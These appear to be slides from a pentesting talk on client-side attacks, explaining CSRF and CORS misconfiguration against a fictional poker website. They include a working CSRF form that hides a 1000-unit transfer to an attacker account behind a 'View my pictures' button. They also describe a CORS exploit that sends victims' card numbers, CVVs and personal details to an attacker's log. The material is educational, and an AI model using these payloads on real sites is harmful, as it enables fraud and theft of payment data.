2. Pentesters need to find a way to make the victims open the door for them to
get into the network, Or force the victim To execute some scripts and actions
without his will. or reading some personal details . Client side attacks require
user-interaction such as enticing them to click a link, open a document, or
somehow get to your malicious website. or infected websiteThat's why
companies are very careful about this kind of attacks ,
Pentest Client side attacks
3. With a little help of social engineering (such as sending a link via
email or chat), an attacker may trick the users of a web application
into executing actions of the attacker's choosing. If the victim is a
normal user, a successful CSRF attack can force the user to
perform state changing requests like transferring funds, changing
their email address, and so forth. If the victim is an administrative
account, CSRF can compromise the entire web application.
CSRF
4. The attacker have found a CSRF that allow him to force the victim to send him a money in
https://poker-example-website.com So with a simple click from the victim (View my
pictures ) in website-attacker.com/csrf.html the money can be sent to the attacker .
Example HTML SOURCE :
<form action="https://poker-example-website.com/transfer.do" method="POST">
<input type="hidden" name="acct" value="ATTACKER_ACCT"/>
<input type="hidden" name="amount" value="1000"/>
<input type="submit" value="View my pictures"/>
</form>
CSRF EXPLOITATION
5. For example the attacker can read arbitrary data from the accounts
of other users.
CORS Misconfiguration Misconceptions :
6. If the attacker find a CORS Misconfiguration in https://poker-example-
website.com he can read the victims personel details Example :
Name
Date of birth
Address
Credit card number
Date of expiration card
CVV
If the victim visit poker-example-website.com/cors.html so the attacker will
receive all the personnel details in logs.txt that was sent by the request
log?key='+this.responseText
CORS Misconfiguration Misconceptions :